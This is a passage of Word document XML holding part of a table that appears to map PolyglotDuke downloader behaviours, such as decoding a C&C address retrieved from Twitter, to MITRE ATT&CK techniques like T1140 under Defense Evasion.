          <w:p w14:paraId="766831CB" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="00B857D7" w:rsidRDefault="00F26597" w:rsidP="00E530D0">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55" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="164B2971" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="00B857D7" w:rsidRDefault="00F26597" w:rsidP="00E530D0">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53" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C818EB8" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="00B857D7" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="714D0B4C" w14:textId="77777777" w:rsidR="00F26597" w:rsidRPr="00B857D7" w:rsidRDefault="00F26597" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33B75660" w14:textId="263B6BD1" w:rsidR="00F26597" w:rsidRPr="00B857D7" w:rsidRDefault="00AA5C01" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B796CC8" w14:textId="0A9C6950" w:rsidR="00F26597" w:rsidRPr="00B857D7" w:rsidRDefault="00A41A4B" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ACCBA61" w14:textId="77777777" w:rsidR="00F26597" w:rsidRDefault="00E43ADD" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] See above</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C4EE836" w14:textId="1EA6EE6C" w:rsidR="00A164AD" w:rsidRPr="00A164AD" w:rsidRDefault="00A164AD" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>PolyglotDuke</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> dropped</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B1179F" w:rsidRPr="005B3D45" w14:paraId="6C4E1296" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36F78E95" w14:textId="49CE5293" w:rsidR="00A164AD" w:rsidRPr="005B3D45" w:rsidRDefault="00AA5C01" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5225B295" w14:textId="77777777" w:rsidR="00A164AD" w:rsidRPr="005B3D45" w:rsidRDefault="00A164AD" w:rsidP="00E530D0">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0B40F0C6" w14:textId="77777777" w:rsidR="00A164AD" w:rsidRPr="005B3D45" w:rsidRDefault="00A164AD" w:rsidP="00E530D0">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53" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55618BF5" w14:textId="3F4C5DBD" w:rsidR="00A164AD" w:rsidRPr="005B3D45" w:rsidRDefault="00AA5C01" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A432068" w14:textId="77777777" w:rsidR="00A164AD" w:rsidRPr="005B3D45" w:rsidRDefault="00A164AD" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C3EE690" w14:textId="77777777" w:rsidR="00A164AD" w:rsidRPr="005B3D45" w:rsidRDefault="00A164AD" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="341FDF4E" w14:textId="1468308C" w:rsidR="00A164AD" w:rsidRPr="005B3D45" w:rsidRDefault="00720B5C" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F52EEE5" w14:textId="77777777" w:rsidR="00A164AD" w:rsidRPr="00A164AD" w:rsidRDefault="00A164AD" w:rsidP="00A164AD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>PolyglotDuke</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A164AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">this downloader shares several similarities with other samples from </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BA3C7EB" w14:textId="77777777" w:rsidR="00A164AD" w:rsidRPr="00A164AD" w:rsidRDefault="00A164AD" w:rsidP="00A164AD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A164AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">previous Dukes campaigns such as the use of Twitter to retrieve and decode its C&amp;C server address, as well </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="618AD2B7" w14:textId="77777777" w:rsidR="00A164AD" w:rsidRDefault="00A164AD" w:rsidP="00A164AD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A164AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>as a custom string encryption implementation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45C687A1" w14:textId="2C91D6A7" w:rsidR="00CB1EC7" w:rsidRPr="00A164AD" w:rsidRDefault="00CB1EC7" w:rsidP="00A164AD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA5C01" w:rsidRPr="00AA5C01" w14:paraId="287D3EDC" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="234ADE29" w14:textId="0B42A507" w:rsidR="00AA5C01" w:rsidRPr="00AA5C01" w:rsidRDefault="00AA5C01" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A398977" w14:textId="05803843" w:rsidR="00AA5C01" w:rsidRPr="00AA5C01" w:rsidRDefault="00AA5C01" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C5B410B" w14:textId="116EB332" w:rsidR="00AA5C01" w:rsidRPr="00AA5C01" w:rsidRDefault="00AA5C01" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33DB2048" w14:textId="0C4C4066" w:rsidR="00AA5C01" w:rsidRPr="00AA5C01" w:rsidRDefault="00AA5C01" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78724976" w14:textId="77777777" w:rsidR="00AA5C01" w:rsidRPr="00AA5C01" w:rsidRDefault="00AA5C01" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="537935DE" w14:textId="153BC7B4" w:rsidR="00AA5C01" w:rsidRPr="00AA5C01" w:rsidRDefault="00AA5C01" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C14652E" w14:textId="30D71775" w:rsidR="00AA5C01" w:rsidRPr="00AA5C01" w:rsidRDefault="006F241D" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="657A8640" w14:textId="7700F56D" w:rsidR="00943C83" w:rsidRPr="00943C83" w:rsidRDefault="00F35DE8" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>[1] See above ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00A164AD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>retrieve and decode its C&amp;C server address</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B1179F" w:rsidRPr="005B3D45" w14:paraId="58105A18" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F74F9D8" w14:textId="75D97AC4" w:rsidR="00CB1EC7" w:rsidRPr="005B3D45" w:rsidRDefault="00CB1EC7" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75A1D65E" w14:textId="77777777" w:rsidR="00CB1EC7" w:rsidRPr="005B3D45" w:rsidRDefault="00CB1EC7" w:rsidP="00E530D0">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5CA9BA93" w14:textId="77777777" w:rsidR="00CB1EC7" w:rsidRPr="005B3D45" w:rsidRDefault="00CB1EC7" w:rsidP="00E530D0">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53" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76677EED" w14:textId="73AE585A" w:rsidR="00CB1EC7" w:rsidRPr="005B3D45" w:rsidRDefault="002B73F8" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B7D4F04" w14:textId="77777777" w:rsidR="00CB1EC7" w:rsidRPr="005B3D45" w:rsidRDefault="00CB1EC7" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="114D55A6" w14:textId="77777777" w:rsidR="00CB1EC7" w:rsidRPr="005B3D45" w:rsidRDefault="00CB1EC7" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EDB8B42" w14:textId="64F6BD4B" w:rsidR="00CB1EC7" w:rsidRPr="005B3D45" w:rsidRDefault="006F241D" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EF780AD" w14:textId="44B2664D" w:rsidR="00CB1EC7" w:rsidRPr="00A164AD" w:rsidRDefault="00CB1EC7" w:rsidP="00CB1EC7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] Fig 12 shows this as a </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>three step</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> initialisation with the C&amp;C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B1179F" w:rsidRPr="005B3D45" w14:paraId="66139A72" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00EB4049" w14:textId="5F094490" w:rsidR="00CB1EC7" w:rsidRPr="005B3D45" w:rsidRDefault="00CB1EC7" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C0DEF02" w14:textId="77777777" w:rsidR="00CB1EC7" w:rsidRPr="005B3D45" w:rsidRDefault="00CB1EC7" w:rsidP="00E530D0">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1D970C4D" w14:textId="77777777" w:rsidR="00CB1EC7" w:rsidRPr="005B3D45" w:rsidRDefault="00CB1EC7" w:rsidP="00E530D0">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53" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46BFAC7B" w14:textId="1103BC11" w:rsidR="00CB1EC7" w:rsidRPr="005B3D45" w:rsidRDefault="002B73F8" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4248C19A" w14:textId="77777777" w:rsidR="00CB1EC7" w:rsidRPr="005B3D45" w:rsidRDefault="00CB1EC7" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C37FF64" w14:textId="77777777" w:rsidR="00CB1EC7" w:rsidRPr="005B3D45" w:rsidRDefault="00CB1EC7" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B4DA65A" w14:textId="7F3F5890" w:rsidR="00CB1EC7" w:rsidRPr="005B3D45" w:rsidRDefault="006F241D" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CF38A76" w14:textId="77777777" w:rsidR="00CB1EC7" w:rsidRPr="00A164AD" w:rsidRDefault="00CB1EC7" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] Fig 12 shows this as a </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>three step</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> initialisation with the C&amp;C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA5C01" w:rsidRPr="00743E00" w14:paraId="1F016855" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57A00867" w14:textId="11F367E2" w:rsidR="00AA5C01" w:rsidRPr="00F35DE8" w:rsidRDefault="002B73F8" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
